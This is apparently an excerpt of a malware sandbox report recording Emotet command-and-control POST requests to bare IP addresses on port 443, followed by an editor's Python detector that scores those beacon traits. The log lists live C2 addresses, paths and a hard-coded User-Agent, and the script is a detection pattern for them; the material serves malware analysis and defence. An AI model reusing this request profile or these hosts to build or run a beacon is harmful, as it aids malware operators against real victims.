Source: global traffic | HTTP traffic detected: POST /I4YV/ HTTP/1.1 | Referer: http://185.94.252.13/I4YV/ | Content-Type: multipart/form-data; boundary=---------------------------746657889525815 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 185.94.252.13:443 | Content-Length: 4596 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /TT3c/MPj2wQ4oxIl/GrLxPw6nfZdMg4piZv/ HTTP/1.1 | Referer: http://185.94.252.13/TT3c/MPj2wQ4oxIl/GrLxPw6nfZdMg4piZv/ | Content-Type: multipart/form-data; boundary=---------------------------635375024525338 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 185.94.252.13:443 | Content-Length: 4596 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /slt8tXRcU9gh/qyntj3OcAf/jnuisYRQq2a/sBeCxff09ks/TxrMGiSDda3t/ HTTP/1.1 | Referer: http://185.94.252.13/slt8tXRcU9gh/qyntj3OcAf/jnuisYRQq2a/sBeCxff09ks/TxrMGiSDda3t/ | Content-Type: multipart/form-data; boundary=---------------------------361669553688262 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 185.94.252.13:443 | Content-Length: 4596 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /Buooish6GSBz/ HTTP/1.1 | Referer: http://185.94.252.13/Buooish6GSBz/ | Content-Type: multipart/form-data; boundary=---------------------------999210879260038 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 185.94.252.13:443 | Content-Length: 4596 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /L9ZtGO/ HTTP/1.1 | Referer: http://185.94.252.13/L9ZtGO/ | Content-Type: multipart/form-data; boundary=---------------------------284212086612098 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 185.94.252.13:443 | Content-Length: 4596 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /c30TGt0oZY/nRvqNsTCJE4pySgd7H9/WUA2QRQo37JD/ HTTP/1.1 | Referer: http://185.94.252.13/c30TGt0oZY/nRvqNsTCJE4pySgd7H9/WUA2QRQo37JD/ | Content-Type: multipart/form-data; boundary=---------------------------555489330362015 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 185.94.252.13:443 | Content-Length: 4596 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /yfWOtgOeLqG/iUyst3sJZ1/ HTTP/1.1 | Referer: http://88.217.172.65/yfWOtgOeLqG/iUyst3sJZ1/ | Content-Type: multipart/form-data; boundary=---------------------------421129473926542 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 88.217.172.65:443 | Content-Length: 4356 | Connection: Keep-Alive | Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 73.116.193.136 (3 entries)
Source: unknown | TCP traffic detected without corresponding DNS query: 185.94.252.13 (20 entries)
                      Source:
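The seven C2 POSTs above share a profile that does not depend on the IP or path: a bare IP in the Host header, a plaintext HTTP request on port 443, a multipart/form-data body, a Referer that is just the request URL itself, and one hard-coded legacy User-Agent repeated verbatim. As an added example by the editor (not part of the Joe Sandbox report), the Python below parses raw HTTP request heads and scores those traits. The first two samples reproduce the request line and headers the report shows for the POSTs to 185.94.252.13 and 88.217.172.65; the third is an invented benign request used as a control. The indicator names and the threshold of three are the editor's choices.

```python
from ipaddress import ip_address

UA = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; "
      ".NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)")

# Constructed request heads: the first two carry the fields shown in the report's
# Networking section; the third is a benign control that is not from the report.
SAMPLES = [
    "POST /I4YV/ HTTP/1.1\r\n"
    "Referer: http://185.94.252.13/I4YV/\r\n"
    "Content-Type: multipart/form-data; boundary=---------------------------746657889525815\r\n"
    f"User-Agent: {UA}\r\n"
    "Host: 185.94.252.13:443\r\nContent-Length: 4596\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
    "POST /yfWOtgOeLqG/iUyst3sJZ1/ HTTP/1.1\r\n"
    "Referer: http://88.217.172.65/yfWOtgOeLqG/iUyst3sJZ1/\r\n"
    "Content-Type: multipart/form-data; boundary=---------------------------421129473926542\r\n"
    f"User-Agent: {UA}\r\n"
    "Host: 88.217.172.65:443\r\nContent-Length: 4356\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) control-client\r\n"
    "Accept: */*\r\nConnection: Keep-Alive\r\n\r\n",
]


def parse_request(raw: str) -> dict:
    """Split a request head into method, path and a lower-cased header dict."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}


def _is_ip(host: str) -> bool:
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def c2_indicators(req: dict) -> list:
    """Return the names of the Emotet C2 traits present in one parsed request."""
    h = req["headers"]
    host, _, port = h.get("host", "").partition(":")
    ua = h.get("user-agent", "")
    hits = []
    if _is_ip(host):
        hits.append("host_is_bare_ip")            # matches the 'TCP traffic without DNS query' events
    if port == "443":
        hits.append("plaintext_http_on_443")      # request head readable in clear on a TLS port
    if req["method"] == "POST" and h.get("content-type", "").startswith("multipart/form-data"):
        hits.append("multipart_form_post")        # encrypted beacon wrapped as a form upload
    if h.get("referer") == f"http://{host}{req['path']}":
        hits.append("referer_mirrors_request")    # Referer is the request URL itself, no origin page
    if "MSIE 7.0" in ua and "Trident/7.0" in ua and "Windows NT 6.2" in ua:
        hits.append("hardcoded_legacy_ua")        # identical string on all seven POSTs in the report
    return hits


def is_emotet_like(raw: str, threshold: int = 3) -> bool:
    return len(c2_indicators(parse_request(raw))) >= threshold


if __name__ == "__main__":
    for raw in SAMPLES:
        req = parse_request(raw)
        print(req["method"], req["headers"].get("host"), c2_indicators(req))
```

Scoring several weak traits together is what makes this usable: any one of them occurs in legitimate traffic, but a multipart POST to a bare IP on 443 in clear text with a self-referential Referer is the shape of this Emotet build's beacon, whichever address it rotates to.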